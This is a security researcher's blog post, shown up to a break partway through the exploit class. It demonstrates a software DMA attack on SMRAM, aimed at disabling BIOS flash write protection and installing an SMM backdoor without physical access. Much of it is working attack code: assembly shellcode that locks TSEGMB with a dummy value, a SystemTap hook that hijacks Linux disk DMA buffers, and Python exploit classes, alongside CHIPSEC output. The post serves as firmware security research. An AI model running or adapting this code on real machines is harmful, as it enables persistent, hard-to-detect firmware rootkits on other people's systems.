Saturday, September 12, 2015

Breaking UEFI security with software DMA attacks

Hi everyone! In this article I’d like to tell you more about exploiting UEFI vulnerabilities. Last time, in the “Exploiting UEFI boot script table vulnerability” blog post, I showed how to execute arbitrary shellcode during the early PEI phase, which makes it possible to bypass the security mechanisms that protect System Management Mode memory (SMRAM) from DMA attacks. Now we will perform such a DMA attack on SMRAM to disable BIOS_CNTL flash write protection, which gives us the ability to write infected firmware to the ROM chip on the motherboard. This attack can be used to install my SMM backdoor without physical access to the target machine (in a previous blog post I explained how it works and how to install it using a hardware programmer). My software DMA attack for Linux hijacks the physical address of a DMA buffer used by the disk driver; the concept was originally presented by Rafal Wojtczuk in his BH US 2008 talk “Subverting the Xen hypervisor”.

BIOS write protection mechanisms


Intel hardware provides two main mechanisms to protect the SPI ROM chip located on the motherboard from being overwritten by the operating system:
  • BIOS Write Enable (BIOSWE) and BIOS Lock Enable (BLE) bits of the BIOS_CNTL register of the Platform Controller Hub (PCH), which is accessible via PCI configuration space.
  • SPI flash Protected Range registers PR0-PR5. Also, the FLOCKDN bit of the HSFS PCH register is used to protect the PR registers from overwriting.
My test hardware from the previous UEFI experiments, the Intel DQ77KB motherboard, does not use SPI flash protected ranges, which is very good for an attacker: this security mechanism (unlike BIOS_CNTL protection) does not rely on System Management Mode, so it can’t be defeated by the software DMA attack on SMRAM that we are talking about. So, the information and techniques from this article are relevant mostly for motherboards and laptops that implement flash write protection with BIOS_CNTL.

Here is the description of BIOSWE and BLE bits from Intel® 7 Series / C216 Chipset Family Platform Controller Hub datasheet:

The BIOSWE bit controls write access to the flash chip: when it’s cleared, only read access is allowed. The BLE bit is more interesting: it is used to protect the BIOSWE bit from unauthorized modification with the help of SMM code. Let’s see how it works:
  1. During the early boot phase system firmware clears BIOSWE and sets BLE. Once the BLE bit is set, it can’t be modified until the next platform reset.
  2. With BLE = 1 every attempt to set the BIOSWE bit raises a System Management Interrupt (SMI), the highest priority interrupt, which suspends operating system execution and switches the CPU to System Management Mode.
  3. During SMI dispatch SMM code clears the BIOSWE bit back to zero and resumes OS execution, so attacker’s code that runs under the OS will never be able to set BIOSWE.
On properly configured and locked platforms the SMM code installed by firmware during the PEI/DXE boot phases is not accessible from the OS, so it can work as a secure broker that protects the BIOS write protection configuration from unauthorized modification. Let’s make a small experiment: using the CHIPSEC platform security assessment framework we can write a Python script that reads the BIOS_CNTL register and tries to set the BIOSWE bit:
def BIOSWE_set():

    BIOSWE = 1

    # import required CHIPSEC stuff
    import chipsec.chipset
    from chipsec.helper.oshelper import helper

    # initialize CHIPSEC helper
    cs = chipsec.chipset.cs()
    cs.init(None, True)

    # check if BIOS_CNTL register is available
    if not chipsec.chipset.is_register_defined(cs, 'BC'):

        raise Exception('Unsupported hardware')

    # get BIOS_CNTL value
    val = chipsec.chipset.read_register(cs, 'BC')

    print '[+] BIOS_CNTL is 0x%x' % val

    if val & BIOSWE == 0:

        print '[+] Trying to set BIOSWE...'

        # try to set BIOS write enable bit
        chipsec.chipset.write_register(cs, 'BC', val | BIOSWE)

        # check if BIOSWE bit was actually set
        val = chipsec.chipset.read_register(cs, 'BC')
        if val & BIOSWE == 0:

            # fails, BIOSWE modification was prevented by SMM
            print '[!] Can\'t set BIOSWE bit, BIOS write protection is enabled'

        else:

            print '[+] BIOSWE bit was set, BIOS write protection is disabled now'

    else:

        print '[+] BIOSWE bit is already set'

if __name__ == '__main__':

    BIOSWE_set()

After running this script as root we will see that on the Intel DQ77KB motherboard it’s not possible to set BIOSWE because BLE protection is enabled:
localhost ~ # python BIOSWE_set.py
[+] BIOS_CNTL is 0x2a
[+] Trying to set BIOSWE...
[!] Can't set BIOSWE bit, BIOS write protection is enabled
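
To make the 0x2a value above easier to read, here is a small sketch that decodes the two bits discussed in this section. It assumes that BIOSWE is bit 0 and BLE is bit 1 of BIOS_CNTL; the helper name decode_bios_cntl is my own and is not part of CHIPSEC. The sketch is written for Python 3.

```python
# Bit positions are assumptions based on the BIOS_CNTL description above
BIOSWE = 1 << 0  # BIOS Write Enable
BLE = 1 << 1     # BIOS Lock Enable

def decode_bios_cntl(val):
    """Return the state of the BIOSWE and BLE bits of a raw BIOS_CNTL value."""
    return {'BIOSWE': bool(val & BIOSWE), 'BLE': bool(val & BLE)}

if __name__ == '__main__':
    # value printed by BIOSWE_set.py on the test machine
    print(decode_bios_cntl(0x2a))
```

For 0x2a this reports BIOSWE as cleared and BLE as set, which matches the behaviour of the script: the write is allowed only for a moment and then reverted by SMM code.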

To learn more about BIOS write protection and security mechanisms you also can read the following materials:

Direct Memory Access


As you may know, the CPU is not the only component with access to physical memory: hardware devices connected to the PCI bus, like a disk controller or network card, can use Direct Memory Access to read or write physical memory independently of the processor. Let’s see how DMA works using an ATA/ATAPI capable disk controller as an example:
  1. Software allocates a chunk of physical memory for I/O operation data and creates a Physical Region Descriptor Table (PRDT) entry for this memory. The PRDT is a special data structure of the DMA controller that is located in physical memory.
  2. Software initializes the Bus Master Register of the disk controller, accessible via PCI configuration space, with the PRDT address and enables bus master operation mode on that controller.
  3. To initiate an I/O operation software sends a DMA read (0xC8/0x25) or DMA write (0xCA/0x35) ATA/ATAPI command to the target disk device. Once the command is sent, the operating system can switch execution context to some other task until the I/O operation is finished.
  4. The DMA controller responds to DMA requests from the disk device and transfers data to or from physical memory.
  5. When the data transfer is complete, the disk device signals an interrupt, which allows the operating system to resume the suspended task.
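
The PRDT entry from step 1 can be sketched as follows. This is only an illustration and it assumes the classic PCI IDE bus master layout: each entry is 8 bytes, a 32-bit physical base address followed by a 16-bit byte count and a 16-bit word whose top bit marks the end of the table. The function name and the example values are hypothetical. The sketch is written for Python 3.

```python
import struct

PRD_EOT = 0x8000  # end-of-table flag in the last 16-bit word (assumed layout)

def make_prd_entry(phys_addr, byte_count, last=False):
    """Pack a single 8-byte Physical Region Descriptor."""
    if phys_addr & 1 or phys_addr > 0xFFFFFFFF:
        raise ValueError('buffer must be word aligned and below 4 GB')
    if not 0 < byte_count <= 0x10000 or byte_count & 1:
        raise ValueError('byte count must be even and at most 64 KB')
    # a byte count field of 0 encodes 64 KB
    return struct.pack('<IHH', phys_addr, byte_count & 0xFFFF,
                       PRD_EOT if last else 0)

if __name__ == '__main__':
    # one 4 KB buffer at physical address 0x1000, last entry of the table
    print(make_prd_entry(0x1000, 0x1000, last=True).hex())
```

Note that nothing in this structure is enforced by hardware: the device is simply trusted to use the addresses that software has put there.
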
It’s easy to see that such a design is not very secure: malicious DMA capable hardware can ignore the buffer address that was set via the PRDT and read or write arbitrary data at an arbitrary location in physical memory without asking software for any permission. To mitigate this issue Intel introduced VT-d, Intel Virtualization Technology for Directed I/O (also known as IOMMU), which makes it possible to limit direct access to physical memory from hardware. IOMMU support is present in modern versions of Windows, Linux and OS X, but for certain firmware attacks, when the attacker already has complete control over the operating system, it’s also necessary to have a separate DMA protection mechanism for SMRAM that is independent from the OS or hypervisor.

This mechanism is the TSEGMB register that was already mentioned in previous articles; it must be properly configured and locked by firmware during platform initialization:


However, if the target firmware is vulnerable to the UEFI boot script table attack, we can bypass TSEGMB protection using the previously developed exploit. To achieve this we need to modify the exploit shellcode and add several assembly instructions that lock the TSEGMB register with a dummy/invalid address that doesn’t match the actual SMRAM location:
; bus = 0, dev = 0, func = 0, offset = 0xb8
mov     eax, 0x800000b8
mov     dx, 0xcf8
out     dx, eax

; read TSEGMB value
mov     dx, 0xcfc
in      eax, dx

; check if TSEGMB is not locked
and     eax, 1
test    eax, eax
jnz     _end

; bus = 0, dev = 0, func = 0, offset = 0xb8
mov     eax, 0x800000b8
mov     dx, 0xcf8
out     dx, eax

; write and lock TSEGMB with dummy value
mov     eax, 0xff000001
mov     dx, 0xcfc
out     dx, eax

_end:

; ...
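
For readers who wonder where the 0x800000b8 constant in the shellcode comes from, here is a sketch of how a PCI configuration address for the 0xCF8 port is built from bus, device, function and register offset. The helper name pci_cfg_addr is my own; the sketch is written for Python 3.

```python
def pci_cfg_addr(bus, dev, func, offset):
    """Build the value written to port 0xCF8 to select a PCI config register."""
    if not (0 <= bus < 0x100 and 0 <= dev < 0x20 and
            0 <= func < 8 and 0 <= offset < 0x100):
        raise ValueError('invalid PCI address')
    # bit 31 is the enable bit, the register offset is dword aligned
    return 0x80000000 | (bus << 16) | (dev << 11) | (func << 8) | (offset & 0xFC)

# lock bit of TSEGMB as used by the shellcode above (bit 0)
TSEGMB_LOCK = 1

if __name__ == '__main__':
    # TSEGMB: bus = 0, dev = 0, func = 0, offset = 0xb8
    print(hex(pci_cfg_addr(0, 0, 0, 0xb8)))
    # dummy TSEG base with the lock bit set
    print(hex(0xff000000 | TSEGMB_LOCK))
```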

Now we can run the exploit, but first let’s check current TSEGMB value using smm_dma module of the CHIPSEC framework:
localhost chipsec # python chipsec_main.py -m smm_dma

[+] loaded chipsec.modules.smm_dma
[*] running loaded modules ..

[*] running module: chipsec.modules.smm_dma
[*] Module path: /usr/src/chipsec/source/tool/chipsec/modules/smm_dma.pyc
[x][ =======================================================================
[x][ Module: SMRAM DMA Protection
[x][ =======================================================================
[*] Registers:
[*] PCI0.0.0_TOLUD = 0xDFA00001 << Top of Low Usable DRAM (b:d.f 00:00.0 + 0xBC)
    [00] LOCK             = 1 << Lock
    [20] TOLUD            = DFA << Top of Lower Usable DRAM
[*] PCI0.0.0_BGSM = 0xD7800001 << Base of GTT Stolen Memory (b:d.f 00:00.0 + 0xB4)
    [00] LOCK             = 1 << Lock
    [20] BGSM             = D78 << Base of GTT Stolen Memory
[*] PCI0.0.0_TSEGMB = 0xD7000001 << TSEG Memory Base (b:d.f 00:00.0 + 0xB8)
    [00] LOCK             = 1 << Lock
    [20] TSEGMB           = D70 << TSEG Memory Base
[*] IA32_SMRR_PHYSBASE = 0xD7000006 << SMRR Base Address MSR (MSR 0x1F2)
    [00] Type             = 6 << SMRR memory type
    [12] PhysBase         = D7000 << SMRR physical base address
[*] IA32_SMRR_PHYSMASK = 0xFF800800 << SMRR Range Mask MSR (MSR 0x1F3)
    [11] Valid            = 1 << SMRR valid
    [12] PhysMask         = FF800 << SMRR address range mask

[*] Memory Map:
[*]   Top Of Low Memory             : 0xDFA00000
[*]   TSEG Range (TSEGMB-BGSM)      : [0xD7000000-0xD77FFFFF]
[*]   SMRR Range (size = 0x00800000): [0xD7000000-0xD77FFFFF]

[*] checking locks..
[+]   TSEGMB is locked
[+]   BGSM is locked
[*] checking TSEG alignment..
[+]   TSEGMB is 8MB aligned
[*] checking TSEG covers entire SMRR range..
[+]   TSEG covers entire SMRAM

[+] PASSED: TSEG is properly configured. SMRAM is protected from DMA attacks

Everything is fine, as you can see: address 0xD7000000 looks legit and the lock bit is also set. You can also run the common.smrr module to ensure that the System Management Range Registers, which are used to protect SMRAM from cache poisoning attacks, point to the same physical address:
localhost chipsec # python chipsec_main.py -m common.smrr

[+] loaded chipsec.modules.common.smrr
[*] running loaded modules ..

[*] running module: chipsec.modules.common.smrr
[*] Module path: /usr/src/chipsec/source/tool/chipsec/modules/common/smrr.pyc
[x][ =======================================================================
[x][ Module: CPU SMM Cache Poisoning / System Management Range Registers
[x][ =======================================================================
[+] OK. SMRR range protection is supported

[*] Checking SMRR range base programming..
[*] IA32_SMRR_PHYSBASE = 0xD7000006 << SMRR Base Address MSR (MSR 0x1F2)
    [00] Type             = 6 << SMRR memory type
    [12] PhysBase         = D7000 << SMRR physical base address
[*] SMRR range base: 0x00000000D7000000
[*] SMRR range memory type is Writeback (WB)
[+] OK so far. SMRR range base is programmed

[*] Checking SMRR range mask programming..
[*] IA32_SMRR_PHYSMASK = 0xFF800800 << SMRR Range Mask MSR (MSR 0x1F3)
    [11] Valid            = 1 << SMRR valid
    [12] PhysMask         = FF800 << SMRR address range mask
[*] SMRR range mask: 0x00000000FF800000
[+] OK so far. SMRR range is enabled

[*] Verifying that SMRR range base & mask are the same on all logical CPUs..
[CPU0] SMRR_PHYSBASE = 00000000D7000006, SMRR_PHYSMASK = 00000000FF800800
[CPU1] SMRR_PHYSBASE = 00000000D7000006, SMRR_PHYSMASK = 00000000FF800800
[CPU2] SMRR_PHYSBASE = 00000000D7000006, SMRR_PHYSMASK = 00000000FF800800
[CPU3] SMRR_PHYSBASE = 00000000D7000006, SMRR_PHYSMASK = 00000000FF800800
[+] OK so far. SMRR range base/mask match on all logical CPUs
[*] Trying to read memory at SMRR base 0xD7000000..
[+] PASSED: SMRR reads are blocked in non-SMM mode

[+] PASSED: SMRR protection against cache attack is properly configured

Now let’s run boot_script_table module to exploit the vulnerability:
localhost chipsec # python chipsec_main.py -m boot_script_table

[+] loaded chipsec.modules.boot_script_table
[*] running loaded modules ..

[*] running module: chipsec.modules.boot_script_table
[*] Module path: /usr/src/chipsec/source/tool/chipsec/modules/boot_script_table.pyc
[x][ =======================================================================
[x][ Module: UEFI boot script table vulnerability exploit
[x][ =======================================================================
[*] AcpiGlobalVariable = 0xd5f53f18
[*] UEFI boot script addr = 0xd5f4c018
[*] Target function addr = 0xd5ddf260
8 bytes to patch
Found 106 zero bytes for shellcode at 0xd5deaf96
Jump from 0xd5deaffb to 0xd5ddf268
Jump from 0xd5ddf260 to 0xd5deaf96
Going to S3 sleep for 10 seconds ...
rtcwake: assuming RTC uses UTC ...
rtcwake: wakeup from "mem" using /dev/rtc0 at Tue Aug 25 08:14:15 2015
[*] BIOS_CNTL = 0x28
[*] TSEGMB = 0xd7000000
[!] Bios lock enable bit is not set
[!] SMRAM is not locked
[!] Your system is VULNERABLE

Checking TSEGMB register after exploitation:
localhost chipsec # python chipsec_main.py -m smm_dma

[+] loaded chipsec.modules.smm_dma
[*] running loaded modules ..

[*] running module: chipsec.modules.smm_dma
[*] Module path: /usr/src/chipsec/source/tool/chipsec/modules/smm_dma.pyc
[x][ =======================================================================
[x][ Module: SMRAM DMA Protection
[x][ =======================================================================
[*] Registers:
[*] PCI0.0.0_TOLUD = 0xDFA00001 << Top of Low Usable DRAM (b:d.f 00:00.0 + 0xBC)
    [00] LOCK             = 1 << Lock
    [20] TOLUD            = DFA << Top of Lower Usable DRAM
[*] PCI0.0.0_BGSM = 0xD7800001 << Base of GTT Stolen Memory (b:d.f 00:00.0 + 0xB4)
    [00] LOCK             = 1 << Lock
    [20] BGSM             = D78 << Base of GTT Stolen Memory
[*] PCI0.0.0_TSEGMB = 0xFF000001 << TSEG Memory Base (b:d.f 00:00.0 + 0xB8)
    [00] LOCK             = 1 << Lock
    [20] TSEGMB           = FF0 << TSEG Memory Base
[*] IA32_SMRR_PHYSBASE = 0xD7000006 << SMRR Base Address MSR (MSR 0x1F2)
    [00] Type             = 6 << SMRR memory type
    [12] PhysBase         = D7000 << SMRR physical base address
[*] IA32_SMRR_PHYSMASK = 0xFF800800 << SMRR Range Mask MSR (MSR 0x1F3)
    [11] Valid            = 1 << SMRR valid
    [12] PhysMask         = FF800 << SMRR address range mask

[*] Memory Map:
[*]   Top Of Low Memory             : 0xDFA00000
[*]   TSEG Range (TSEGMB-BGSM)      : [0xFF000000-0xD77FFFFF]
[*]   SMRR Range (size = 0x00800000): [0xD7000000-0xD77FFFFF]

[*] checking locks..
[+]   TSEGMB is locked
[+]   BGSM is locked
[*] checking TSEG alignment..
[+]   TSEGMB is 8MB aligned
[*] checking TSEG covers entire SMRR range..
[-]   TSEG doesn't cover entire SMRAM

[-] FAILED: TSEG is not properly configured. SMRAM is vulnerable to DMA attacks
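
The failed check can be reproduced by hand from the register values printed above. The following sketch only mirrors the arithmetic visible in the output and is not the actual CHIPSEC implementation; it assumes that the low 20 bits of TSEGMB/BGSM and the low 12 bits of the SMRR MSRs are not part of the address, and all function names are my own. The sketch is written for Python 3.

```python
def smrr_range(physbase, physmask):
    """Return (first, last) physical address covered by SMRR."""
    base = physbase & 0xFFFFF000
    mask = physmask & 0xFFFFF000
    size = ((~mask) & 0xFFFFFFFF) + 1
    return base, base + size - 1

def tseg_range(tsegmb, bgsm):
    """Return (first, last) physical address of the TSEGMB-BGSM range."""
    return tsegmb & 0xFFF00000, (bgsm & 0xFFF00000) - 1

def tseg_covers_smrr(tsegmb, bgsm, physbase, physmask):
    tseg_lo, tseg_hi = tseg_range(tsegmb, bgsm)
    smrr_lo, smrr_hi = smrr_range(physbase, physmask)
    return tseg_lo <= smrr_lo and smrr_hi <= tseg_hi

if __name__ == '__main__':
    # register values before and after the exploit
    print(tseg_covers_smrr(0xD7000001, 0xD7800001, 0xD7000006, 0xFF800800))
    print(tseg_covers_smrr(0xFF000001, 0xD7800001, 0xD7000006, 0xFF800800))
```

With the original TSEGMB value both ranges are 0xD7000000-0xD77FFFFF; with the dummy value the TSEG base lies above SMRAM, so the DMA protected range no longer covers it.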

Ok, DMA protection of SMRAM is disabled and we can move to the next step. Of course, it’s completely pointless to perform such an attack with specially designed hardware: we want to break all the things without any physical access to the target platform, which means that we need to hijack DMA transactions initiated by the operating system by hooking device driver code.

Hooking Linux kernel with SystemTap


The idea of the software DMA attack proposed by Rafal Wojtczuk in his “Subverting the Xen hypervisor” talk is the following:
  1. To read arbitrary physical memory the attacker opens an empty file with the O_DIRECT flag of open(), which is needed to bypass the file system cache.
  2. Then the attacker allocates a dummy virtual memory buffer using mmap() and writes it to the opened file with the write() syscall.
  3. During disk write dispatch the ATAPI driver of the Linux kernel calls the dma_map_sg() function to set up physical memory buffers for a scatter-gather DMA operation. The attacker needs to hook this function, iterate over the memory buffers described by the scatterlist structure, find the physical address of the previously allocated buffer and replace it with the address of the physical memory that needs to be read.
  4. When write() successfully returns, the attacker can read the data back from the file to get the dumped memory contents.
The arbitrary physical memory write scenario is almost the same, but the attacker needs to use the read() syscall instead of write().

The kernel documentation has a "Dynamic DMA mapping Guide" (DMA-API-HOWTO.txt) document that is a good walkthrough of the Linux DMA API for device driver development. Memory regions allocated for a scatter-gather DMA operation are represented by scatterlist structures. Here is the definition from the kernel headers; the physical address of the memory buffer that was passed to the read()/write() syscall usually ends up in the dma_address field:
struct scatterlist {
#ifdef CONFIG_DEBUG_SG
        unsigned long   sg_magic;
#endif
        unsigned long   page_link;
        unsigned int    offset;
        unsigned int    length;
        dma_addr_t      dma_address;
#ifdef CONFIG_NEED_SG_DMA_LENGTH
        unsigned int    dma_length;
#endif
};

Rafal used a loadable kernel module to hook the dma_map_sg() function. Unfortunately, on my version of the Linux kernel this function is defined as a simple macro that expands to a call to the dma_map_sg_attrs() function:
#define dma_map_sg(d, s, n, r) dma_map_sg_attrs(d, s, n, r, NULL)

static inline int dma_map_sg_attrs(struct device *dev, struct scatterlist *sg,
                                   int nents, enum dma_data_direction dir,
                                   struct dma_attrs *attrs)
{
        struct dma_map_ops *ops = get_dma_ops(dev);
        int i, ents;
        struct scatterlist *s;

        for_each_sg(sg, s, nents, i)
                kmemcheck_mark_initialized(sg_virt(s), s->length);
        BUG_ON(!valid_dma_direction(dir));
        ents = ops->map_sg(dev, sg, nents, dir, attrs);
        BUG_ON(ents < 0);
        debug_dma_map_sg(dev, sg, nents, ents, dir);

        return ents;
}

Because dma_map_sg_attrs() is inline, we can’t easily locate and hook its code, so we have to find some other solution. As you can see, it calls the debug_dma_map_sg() function, which might also be possible to hook:
extern void debug_dma_map_sg(struct device *dev, struct scatterlist *sg,
                             int nents, int mapped_ents, int direction);

Actually, this function is present in the kernel binary only if the kernel was compiled with the CONFIG_DMA_API_DEBUG option, and because it’s very unlikely that your favourite Linux distro enables it, we have to configure and build a new kernel from source. This limitation isn’t nice, but for proof of concept purposes it’s not very critical. Also, for a reliable real-life firmware rootkit it’s still possible to implement binary heuristics that locate the inlined dma_map_sg_attrs() code, but this topic is out of scope for the current article.

To make the DMA attack PoC a bit simpler I implemented the debug_dma_map_sg() hook with the help of SystemTap instead of writing a loadable kernel module by hand. SystemTap is a Linux analog of DTrace that allows developers and administrators to write scripts in a simplified C-like language to examine the activity of a live Linux system. SystemTap works by translating the script to C and running the system C compiler to create a kernel module from it. When the module is loaded, it activates all the probed events by hooking into the kernel.

Here you can see a simple SystemTap script that hooks the debug_dma_map_sg() function and prints information about its arguments to stdout:
#
# kernel function probe handler
#
probe kernel.function("debug_dma_map_sg")
{
    printf("%s(%d): %s(): %d\n", execname(), pid(), probefunc(), $nents);

    #
    # Each call to sys_write() leads to corresponding call of dma_map_sg(),
    # $sg argument contains list of DMA buffers
    #
    for (i = 0; i < $nents; i++)
    {
        printf(" #%d (0x%x): 0x%x\n", i, $sg[i]->length, $sg[i]->dma_address);
    }
}

On Debian based systems SystemTap can be installed with the apt-get install systemtap command. If you want to install it from source, be sure that your kernel was compiled with the following options enabled:
  • CONFIG_DEBUG_INFO
  • CONFIG_KPROBES
  • CONFIG_RELAY
  • CONFIG_DEBUG_FS
  • CONFIG_MODULES
  • CONFIG_MODULE_UNLOAD
  • CONFIG_UPROBES
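
If you are not sure how your kernel was built, the list above can be checked against the kernel configuration file. Here is a minimal sketch of such a check; it assumes that you have the configuration as plain text (on many distros it can be found in /boot/config-<version>, but the exact location is an assumption and varies), and the function name missing_options is my own. The sketch is written for Python 3.

```python
REQUIRED = ['CONFIG_DEBUG_INFO', 'CONFIG_KPROBES', 'CONFIG_RELAY',
            'CONFIG_DEBUG_FS', 'CONFIG_MODULES', 'CONFIG_MODULE_UNLOAD',
            'CONFIG_UPROBES']

def missing_options(config_text, required=REQUIRED):
    """Return required options that are not enabled in the given config text."""
    enabled = set()
    for line in config_text.splitlines():
        line = line.strip()
        # disabled options look like "# CONFIG_FOO is not set"
        if line.startswith('#') or '=' not in line:
            continue
        name, value = line.split('=', 1)
        if value in ('y', 'm'):
            enabled.add(name)
    return [opt for opt in required if opt not in enabled]

if __name__ == '__main__':
    sample = 'CONFIG_KPROBES=y\n# CONFIG_UPROBES is not set\n'
    print(missing_options(sample))
```
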
Now let’s try to run our test script using stap command:
localhost ~ # stap -v debug_dma_map_sg.stp
Pass 1: parsed user script and 109 library script(s) using 62180virt/36436res/4264shr/32980data kb, in 160usr/10sys/171real ms.
Pass 2: analyzed script: 1 probe(s), 11 function(s), 4 embed(s), 0 global(s) using 108852virt/84660res/5780shr/79652data kb, in 790usr/210sys/997real ms.
Pass 3: translated to C into "/tmp/stapo6EAoq/stap_be741121b1c20b85b38ff640ac798be6_6031_src.c" using 108852virt/84788res/5908shr/79652data kb, in 190usr/50sys/237real ms.
Pass 4: compiled C into "stap_be741121b1c20b85b38ff640ac798be6_6031.ko" in 3430usr/290sys/4579real ms.
Pass 5: starting run.
usb-storage(1110): debug_dma_map_sg(): 9
 #0 (0x1000): 0x3ecca2000
 #1 (0x1000): 0x2f34000
 #2 (0x1000): 0x41e2b4000
 #3 (0x1000): 0xd671e000
 #4 (0x1000): 0x41e22e000
 #5 (0x1000): 0x40687b000
 #6 (0x1000): 0x4061b9000
 #7 (0x1000): 0xd670e000
 #8 (0x1000): 0x41ddc0000
usb-storage(1110): debug_dma_map_sg(): 1
 #0 (0x1000): 0x4027e000
usb-storage(1110): debug_dma_map_sg(): 2
 #0 (0x1000): 0x4023d6000
 #1 (0x1000): 0x3f7be6000
usb-storage(1110): debug_dma_map_sg(): 1
 #0 (0x1000): 0x406595000
usb-storage(1110): debug_dma_map_sg(): 1
 #0 (0x1000): 0x41e1fb000
usb-storage(1110): debug_dma_map_sg(): 2
 #0 (0x1000): 0xd5460000
 #1 (0x1000): 0xd522f000
usb-storage(1110): debug_dma_map_sg(): 2

Writing DMA attack exploit


I decided to write the software DMA exploit in Python, same as the tools from my previous posts. First of all, we need to implement the DMA buffer hijack. The following SystemTap script (stored as a Python string variable) accepts the physical address of the memory buffer passed to read()/write() as its first argument and the target physical memory address that we need to read/write as its second:
# print more information from running SystemTap script
VERBOSE = False

# script source code
SCRIPT_CODE = '''

global data_len = 0
global verbose = ''' + ('1' if VERBOSE else '0') + '''

#
# kernel function probe handler
#
probe kernel.function("debug_dma_map_sg")
{
    # parse script arguments passed to stap
    phys_addr = strtol(@1, 16);
    target_addr = strtol(@2, 16);

    printf("%s(%d): %s(): %d\\n", execname(), pid(), probefunc(), $nents);

    #
    # Each call to sys_write() leads to corresponding call of dma_map_sg(),
    # $sg argument contains list of DMA buffers
    #
    if (verbose != 0)
    {
        for (i = 0; i < $nents; i++)
        {
            printf(" #%d (0x%x): 0x%x\\n", i, $sg[i]->length, $sg[i]->dma_address);
        }
    }    

    # check for data that came from dma_expl.py os.write() call
    if ($nents > 0 && $sg[0]->dma_address == phys_addr)
    {
        printf("[+] DMA request found, changing address to 0x%x\\n",
               target_addr + data_len);

        # replace addresses of DMA buffers
        for (i = 0; i < $nents; i++)
        {
            $sg[i]->dma_address = target_addr + data_len;
            data_len += $sg[i]->length;    
        }
    }
}

'''
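
To make the address replacement logic of the script easier to follow, here is the same algorithm modelled in plain Python, without any kernel involved. The scatterlist is represented as a list of dictionaries and the class name Hijacker is hypothetical; it is a model of the probe handler above, not a replacement for it. The sketch is written for Python 3.

```python
class Hijacker(object):

    def __init__(self, phys_addr, target_addr):
        self.phys_addr = phys_addr      # physical address of our dummy buffer
        self.target_addr = target_addr  # physical memory we want to access
        # like the global in the script, this counter survives between calls
        self.data_len = 0

    def on_map_sg(self, sg):
        """Model of the probe: sg is a list of {'dma_address', 'length'}."""
        # only requests that start with our dummy buffer are interesting
        if not sg or sg[0]['dma_address'] != self.phys_addr:
            return False
        # point every entry at consecutive chunks of the target memory
        for entry in sg:
            entry['dma_address'] = self.target_addr + self.data_len
            self.data_len += entry['length']
        return True

if __name__ == '__main__':
    h = Hijacker(0x3fa15e000, 0xD7000000)
    sg = [{'dma_address': 0x3fa15e000, 'length': 0x1000},
          {'dma_address': 0x12345000, 'length': 0x1000}]
    h.on_map_sg(sg)
    print([hex(e['dma_address']) for e in sg])
```

Because data_len is never reset, every next hijacked request continues right after the memory covered by the previous one, so a large region can be processed with a sequence of I/O operations and a single running script.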

A Python class that inherits threading.Thread runs the SystemTap script in the background and prints its output to stdout:
import os, sys, time, signal
import subprocess, threading

SCRIPT_PATH = '/tmp/dma_expl.stp'

class Worker(threading.Thread):

    def __init__(self, phys_addr, target_addr):

        super(Worker, self).__init__()

        self.daemon = True
        self.started = True
        self.count = 0

        # drop script file into the /tmp
        self.create_file()

        # run SystemTap script
        self.p = subprocess.Popen([ 'stap', '-g', '-v', SCRIPT_PATH,
                                  hex(phys_addr), hex(target_addr) ],
                                  stdout = subprocess.PIPE, stderr = subprocess.PIPE)

        # wait for script initialization
        while self.started:

            line = self.p.stderr.readline()
            sys.stdout.write(line)

            if line == '':

                break

            # check for pass 5 that indicates successfully loaded script
            elif line.find('Pass 5') == 0:

                print '[+] SystemTap script started'
                break

    def create_file(self):

        # save script contents into the file
        with open(SCRIPT_PATH, 'wb') as fd:

            fd.write(SCRIPT_CODE)

    def run(self):

        while self.started:

            # read and print script output
            line = self.p.stdout.readline()

            if VERBOSE:

                sys.stdout.write(line)

            if line == '':

                self.started = False
                break

            # check for hijacked DMA request
            elif line.find('[+]') == 0:

                self.count += 1

    def start(self):

        super(Worker, self).start()

        # delay after script start
        time.sleep(1)

    def stop(self):

        if self.started:

            # delay before script shutdown
            time.sleep(3)

            self.started = False
            os.kill(self.p.pid, signal.SIGINT)

Now we need to allocate the data buffer for disk read/write and get its physical address. Python has a built-in mmap module, but this module doesn’t allow us to determine the virtual address of the allocated memory. To deal with this problem I used ctypes and a neat introspection hack that was mentioned in the “Understanding Python by breaking it” article by Clement Rouault:
import mmap
from ctypes import *

class PyObj(Structure):

    _fields_ = [("ob_refcnt", c_size_t),
                ("ob_type", c_void_p)]

# ctypes object for introspection
class PyMmap(PyObj):

    _fields_ = [("ob_addr", c_size_t)]

# class that inherits mmap.mmap and has the page address
class MyMap(mmap.mmap):

    def __init__(self, *args, **kwarg):

        # get the page address by introspection of the native structure
        m = PyMmap.from_address(id(self))
        self.addr = m.ob_addr

To convert the obtained virtual address to a physical one the exploit uses the /proc/self/pagemap Linux pseudo-file, which allows a process to find out which physical frame each virtual page is mapped to. Every page of virtual memory is represented inside pagemap as a single 8-byte entry that contains the physical memory Page Frame Number (PFN) and information flags.
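
Here is a small standalone sketch of how such an entry can be located and decoded. It assumes the layout from the kernel pagemap documentation (bits 0-54 hold the PFN, bit 62 is the "swapped" flag and bit 63 is the "present" flag) and 4 KB pages; the function names are my own. The sketch is written for Python 3.

```python
PAGE_SIZE = 0x1000

PM_PRESENT = 1 << 63           # page is present in RAM
PM_SWAPPED = 1 << 62           # page is swapped out
PM_PFN_MASK = (1 << 55) - 1    # bits 0-54: page frame number

def pagemap_offset(virt_addr):
    """File offset of the 8-byte pagemap entry for a virtual address."""
    return (virt_addr // PAGE_SIZE) * 8

def decode_pagemap_entry(entry):
    """Return the physical address of the page described by a pagemap entry."""
    if entry & PM_PRESENT == 0:
        raise ValueError('Page is not present')
    if entry & PM_SWAPPED != 0:
        raise ValueError('Page is swapped out')
    return (entry & PM_PFN_MASK) * PAGE_SIZE

if __name__ == '__main__':
    # hypothetical entry: present page with PFN 0x3fa15e
    print(hex(decode_pagemap_entry(PM_PRESENT | 0x3fa15e)))
```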

Here’s the exploit class: its constructor accepts the address of physical memory to read/write, allocates the data buffer, obtains its physical address and starts the SystemTap script:
import struct

PAGE_SIZE = 0x1000
TEMP_PATH = '/tmp/dma_expl.tmp'

class DmaExpl(object):

    # maximum amount of data that can be transferred during a single dma_map_sg() call
    MAX_IO_SIZE = PAGE_SIZE * 0x1E

    def __init__(self, target_addr):

        if target_addr & (PAGE_SIZE - 1) != 0:

            raise Exception('Address must be aligned by 0x%x' % PAGE_SIZE)

        self.phys_addr = 0
        self.target_addr = target_addr
        self.libc = cdll.LoadLibrary("libc.so.6")

        # allocate dummy data buffer
        self.buff = MyMap(-1, self.MAX_IO_SIZE, mmap.PROT_WRITE) 
        self.buff.write('\x41' * self.MAX_IO_SIZE)

